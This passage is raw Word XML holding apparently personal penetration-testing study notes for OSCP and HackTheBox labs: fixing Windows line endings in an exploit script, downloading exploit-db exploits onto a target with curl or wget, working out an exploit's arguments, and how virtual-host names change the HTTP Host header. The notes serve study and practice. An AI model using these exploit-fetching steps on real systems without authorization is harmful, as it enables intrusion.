            <wp:docPr id="24" name="image22.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image22.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId112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32E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1012"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the OSCP-A Challenge lab, I remember getting an error like this from an exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1012"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-bash: ./39535.sh:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /bin/sh^M</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: bad interpreter: No such file or directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1012"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But, apparently this is common and has to do with the exploit using windows new lines character </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032E4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1012"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To fix this, we just run:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032E5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1012"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sed -i -e "s/^M//" </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">39535.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1012"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace with your exploit name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032E7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1012"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To type </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"^M</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" in linux, press </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CTRL + V </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and then </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">M</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032E8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1314"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from </w:t>
      </w:r>
      <w:hyperlink r:id="rId1121">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Tib3rius Linux Priv esc course</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1314"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Video: SUID / SGID Executables</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1314"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Time: 4:45</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032EC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032ED">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032EE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is how to get an exploit into your VM:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032EF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032F0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1587500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="35" name="image30.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image30.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1122"/>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32F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="869"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TIP: On the target machine, move to /tmp or any other non-important directory since sometimes if you are in another directory, you might not have valid permissions to upload to that directory</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="869"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You see the EDB-ID. So just do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032F3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="869"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -o exploit.py https://www.exploit-db.com/raw/EXPID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="869"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wget https://www.exploit-db.com/raw/EXPID -O exploit.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="869"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This saves exploit to a file named exploit.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="869"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or, you can click on the {} which gives you a URL to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">https://www.exploit-db.com/raw/51797</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and then you can use the same command was before</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032F7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032F8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032F9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LEARN HOW TO USE IT:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="770"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 exploit.py -h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="770"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 exploit.py --help</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="770"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This should tell you how to run it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="770"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at the code and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CTRL+F</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> "argument" or anything like that to see what arguments it wants</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032FE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="770"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Many exploits include a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">usage() </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">function or comments explaining how to run them.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032FF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033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01">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003302">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8opbjai5itfz" w:id="451"/>
      <w:bookmarkEnd w:id="451"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hosts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003303">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003304">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I added "10.129.227.248 s3.thetoppers.htb" to my host.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003305">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003306">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And when I searched s3.thetoppers.htb, I got a different website than when I searched 10.129.227.248.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003307">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003308">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When you visit a website using a hostname like s3.thetoppers.htb, your browser includes a Host header in the HTTP request:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003309">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000330A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1454"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GET / HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000330B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Host: s3.thetoppers.htb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000330C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000330D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000330E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When you visit using the IP directly (e.g., http://10.129.227.248), the Host header will contain just the IP address:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000330F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
